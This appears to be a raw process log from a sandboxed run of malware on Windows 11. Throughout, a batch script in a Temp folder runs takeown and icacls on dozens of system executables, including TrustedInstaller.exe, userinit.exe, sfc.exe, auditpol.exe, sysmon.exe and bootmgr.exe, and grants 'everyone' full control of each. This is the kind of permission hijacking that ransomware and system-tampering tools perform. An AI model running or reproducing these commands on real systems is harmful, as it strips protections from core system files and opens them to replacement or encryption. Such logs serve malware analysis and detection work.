C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-setupapi_31bf3856ad364e35_10.0.22000.469_none_3a8cfd7d7fe46760\f\wowreg32.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-speechcommon-onecore_31bf3856ad364e35_10.0.22000.348_none_790557e9d75b5a9c\f\SpeechModelDownload.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_03b4c900a639c980\f\TpmTool.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_03b4c900a639c980\f\TpmTool.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-tpm-tool_31bf3856ad364e35_10.0.22000.282_none_03b4c900a639c980\f\TpmTool.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_7918a9fd73257276\f\LaunchWinApp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_7918a9fd73257276\f\LaunchWinApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-twinui_31bf3856ad364e35_10.0.22000.493_none_7918a9fd73257276\f\LaunchWinApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-u..etry-client-wowonly_31bf3856ad364e35_10.0.22000.318_none_92049afacb4417d8\f\dtdump.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-u..etry-client-wowonly_31bf3856ad364e35_10.0.22000.318_none_92049afacb4417d8\f\dtdump.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-u..etry-client-wowonly_31bf3856ad364e35_10.0.22000.318_none_92049afacb4417d8\f\dtdump.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_c87c050022130145\f\userinit.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_c87c050022130145\f\userinit.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-userinit_31bf3856ad364e35_10.0.22000.37_none_c87c050022130145\f\userinit.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\WSManHTTPConfig.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\WSManHTTPConfig.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\WSManHTTPConfig.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\wsmprovhost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\wsmprovhost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-w..for-management-core_31bf3856ad364e35_10.0.22000.282_none_cfe0738266c4e593\f\wsmprovhost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_30f8a86da4d47388\f\sfc.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_30f8a86da4d47388\f\sfc.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-wrp-integrity-client_31bf3856ad364e35_10.0.22000.120_none_30f8a86da4d47388\f\sfc.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\f\CheckNetIsolation.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\f\CheckNetIsolation.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\f\CheckNetIsolation.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchFilterHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchIndexer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchIndexer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchIndexer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_product-containeros__windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_2b1b00237ae1bbca\f\SearchProtocolHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchFilterHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchFilterHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchProtocolHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchProtocolHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-bootenvironment-pxe_31bf3856ad364e35_10.0.22000.434_none_8c92a0565e9eec19\f\bootmgr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-bootenvironment-pxe_31bf3856ad364e35_10.0.22000.434_none_8c92a0565e9eec19\f\bootmgr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-bootenvironment-pxe_31bf3856ad364e35_10.0.22000.434_none_8c92a0565e9eec19\f\bootmgr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_eb6ed0d1cadda675\f\dcdiag.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_eb6ed0d1cadda675\f\dcdiag.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_eb6ed0d1cadda675\f\dcdiag.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_ea163a1fcbc61cc7\f\dsmgmt.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_ea163a1fcbc61cc7\f\dsmgmt.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_ea163a1fcbc61cc7\f\dsmgmt.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..ommandline-repadmin_31bf3856ad364e35_10.0.22000.434_none_a003f3391feff8a5\f\repadmin.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..ommandline-repadmin_31bf3856ad364e35_10.0.22000.434_none_a003f3391feff8a5\f\repadmin.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-d..ommandline-repadmin_31bf3856ad364e35_10.0.22000.434_none_a003f3391feff8a5\f\repadmin.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_8c1e5976c0145439\f\PkgMgr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_8c1e5976c0145439\f\PkgMgr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-packagemanager_31bf3856ad364e35_10.0.22000.120_none_8c1e5976c0145439\f\PkgMgr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_0f0554e930e1de1c\f\RMActivate_ssp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_0f0554e930e1de1c\f\RMActivate_ssp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\x86_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_0f0554e930e1de1c\f\RMActivate_ssp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\TrustedInstaller.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\TrustedInstaller.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\TrustedInstaller.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Speech\Common\sapisvr.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\Speech\Common\sapisvr.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Speech\Common\sapisvr.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\splwow64.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\splwow64.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\splwow64.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\sysmon.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\sysmon.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\sysmon.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\agentactivationruntimestarter.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\agentactivationruntimestarter.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\agentactivationruntimestarter.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\appidtel.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\appidtel.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\appidtel.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ARP.EXE"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\ARP.EXE"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\ARP.EXE" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\at.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\at.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\at.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\AtBroker.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\AtBroker.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\AtBroker.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\attrib.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\attrib.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\attrib.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\auditpol.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\auditpol.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\auditpol.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\autochk.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\autochk.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\autochk.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\backgroundTaskHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\backgroundTaskHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\backgroundTaskHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\BackgroundTransferHost.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\BackgroundTransferHost.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\BackgroundTransferHost.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bitsadmin.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\bitsadmin.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\bitsadmin.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\bthudtask.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\bthudtask.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\bthudtask.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\ByteCodeGenerator.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\ByteCodeGenerator.exe" /grant "everyone":(f)
